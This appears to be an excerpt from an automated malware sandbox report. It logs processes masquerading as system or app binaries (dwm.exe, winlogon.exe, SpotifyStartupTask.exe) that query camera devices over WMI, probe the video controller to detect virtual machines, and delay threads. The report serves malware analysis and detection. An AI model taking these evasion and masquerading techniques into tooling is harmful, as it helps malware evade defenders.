                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeMemory allocated: F10000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeMemory allocated: 1AAA0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeMemory allocated: 1090000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeMemory allocated: 1ADB0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeMemory allocated: 9E0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeMemory allocated: 1A600000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeMemory allocated: BC0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeMemory allocated: 1A970000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeMemory allocated: 1120000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeMemory allocated: 1AB60000 memory reserve | memory write watch
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeMemory allocated: 14E0000 memory reserve | memory write watch
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeMemory allocated: 1AEA0000 memory reserve | memory write watch
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeMemory allocated: 2790000 memory reserve | memory write watch
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeMemory allocated: 1A930000 memory reserve | memory write watch
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeMemory allocated: 16B0000 memory reserve | memory write watch
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeMemory allocated: 1B0D0000 memory reserve | memory write watch
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeMemory allocated: 730000 memory reserve | memory write watch
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeMemory allocated: 1A3D0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeMemory allocated: F50000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeMemory allocated: 1A910000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeMemory allocated: D30000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeMemory allocated: 1A9B0000 memory reserve | memory write watch
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeMemory allocated: DC0000 memory reserve | memory write watch
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeMemory allocated: 1A890000 memory reserve | memory write watch
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeMemory allocated: 9F0000 memory reserve | memory write watch
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeMemory allocated: 1A470000 memory reserve | memory write watch
                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 24_2_00007FF88B505FDC sldt word ptr [eax]24_2_00007FF88B505FDC
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599874Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599764Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599655Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599547Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599437Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599324Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597500Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597382Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597265Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597156Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 600000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 599875
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 599610
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 599438
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 3600000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598938
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598766
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598610
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598250
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597985
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597860
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597749
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597640
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597526
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597415
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597130
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597016
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596820
